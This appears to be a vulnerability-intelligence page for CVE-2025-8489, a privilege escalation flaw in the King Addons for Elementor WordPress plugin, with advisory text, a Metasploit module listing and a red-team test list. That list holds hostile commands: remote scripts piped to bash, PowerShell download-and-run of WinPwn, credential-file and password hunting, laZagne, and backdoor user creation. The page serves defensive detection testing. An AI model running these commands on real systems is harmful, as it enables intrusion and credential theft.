CVE-2025-8489
Overview
This vulnerability is a privilege escalation flaw caused by improper role restriction during user registration within the King Addons for Elementor WordPress plugin. The affected component is the user registration feature, specifically the Login_Register_Form_Ajax.php handler, which fails to validate or restrict the roles assigned to newly registered users. This allows unauthorized assignment of administrator-level privileges during account creation.
Vulnerability Description
The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14 . This is due to the plugin not properly restricting the roles that users can register with. This makes it possible for unauthenticated attackers to register with administrator-level user accounts.
Impact
An unauthenticated attacker can create a new user account with administrator privileges, gaining full control over the WordPress site including content modification, plugin installation, and data access. This can lead to complete site compromise, data breach, or service disruption. The attack requires no authentication or user interaction and can be performed remotely over the network, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N.
Solution
Users of King Addons for Elementor should upgrade to version 51.1.15 or later, where the privilege escalation issue is fixed by enforcing role restrictions during registration. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/a1bb2b06-9a3b-4428-8624-26a1202fe3b0) and the WordPress plugin repository changelogs for patch details. No other workarounds are recommended; prompt update is required to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the King Addons for Elementor plugin for WordPress is rooted in improper role management, specifically regarding user registration. This flaw allows unauthenticated users to create accounts with elevated privileges, including administrator-level access. The plugin fails to enforce adequate restrictions on the roles that can be assigned during the registration process. As a result, an attacker can exploit this weakness to gain unauthorized access to the WordPress backend, potentially leading to full control over the website and its associated data.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a simple registration request to the WordPress site utilizing the vulnerable plugin, bypassing any intended restrictions on user roles. This could be achieved using automated scripts or tools that interact with the registration endpoint. Once an attacker registers as an administrator, they can perform a multitude of malicious actions, such as modifying site content, installing additional malicious plugins, or extracting sensitive user data. The ease of exploitation, combined with the lack of authentication requirements, significantly amplifies the risk associated with this vulnerability.
The real-world impact of this privilege escalation vulnerability can be severe, particularly for businesses relying on WordPress for their online presence. An attacker gaining administrator access can lead to data breaches, defacement of the website, or even the complete compromise of the server hosting the WordPress instance. This not only jeopardizes the integrity and confidentiality of sensitive information but also poses a significant reputational risk. Customers may lose trust in a business that suffers a data breach, leading to potential financial losses and legal ramifications. Moreover, the presence of such vulnerabilities can attract scrutiny from regulatory bodies, especially if sensitive customer data is involved.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments should be conducted to identify and remediate weaknesses in plugins and themes. Additionally, organizations should ensure that only trusted and well-maintained plugins are used, and they should keep all software components up to date to mitigate exposure to known vulnerabilities. Employing a web application firewall (WAF) can also help filter out malicious requests and provide an additional layer of security. Furthermore, implementing strict user role management policies and monitoring user registrations can help prevent unauthorized account creation.
In conclusion, the privilege escalation vulnerability in the King Addons for Elementor plugin poses a significant threat to WordPress sites. The potential for unauthorized access to administrator-level accounts can lead to severe consequences for businesses, including data breaches and reputational damage. By adopting proactive detection and mitigation strategies, organizations can better protect themselves against such vulnerabilities and ensure the security of their online assets. It is imperative for businesses to remain vigilant and responsive to emerging threats in the ever-evolving landscape of cybersecurity.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE
exploits/multi/http/wp_king_addons_privilege_escalation
|
Peter Thaleikis, Valentin Lobstein <[email protected]> | Unknown | - | View |
Threat Feed
2 eventsSighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-8489 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/a1bb2b06-9a3b-4428-8624-26a1202fe3b0?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/king-addons/tags/24.12.93/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L353 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.35/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L160 |